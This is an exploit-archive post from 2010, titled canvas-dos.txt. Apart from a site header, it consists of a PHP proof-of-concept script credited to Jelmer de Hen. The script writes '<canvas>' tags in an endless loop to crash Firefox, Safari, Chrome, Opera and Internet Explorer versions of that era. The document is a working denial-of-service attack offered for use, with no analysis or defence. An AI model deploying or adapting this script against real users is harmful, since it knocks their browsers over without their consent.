Home / os / win7

canvas-dos.txt

Posted on 28 April 2010

<?php # Canvas tag DoS Mozilla firefox 3.6.3 # Canvas tag DoS Safari 4.0.5 # Canvas tag DoS Google Chrome 4.1 # Canvas tag DoS Opera 10.52 # Canvas tag DoS Internet Explorer 6.0 & 8.0 # # Found by Jelmer de Hen # published at http://h.ackack.net/?p=269 # OS: Windows XP SP3 # Mozilla Firefox 3.6.3 echo "<html><body>"; while (1){ echo "<canvas>"; } echo "</body>"; echo "</html>"; ?>

 

TOP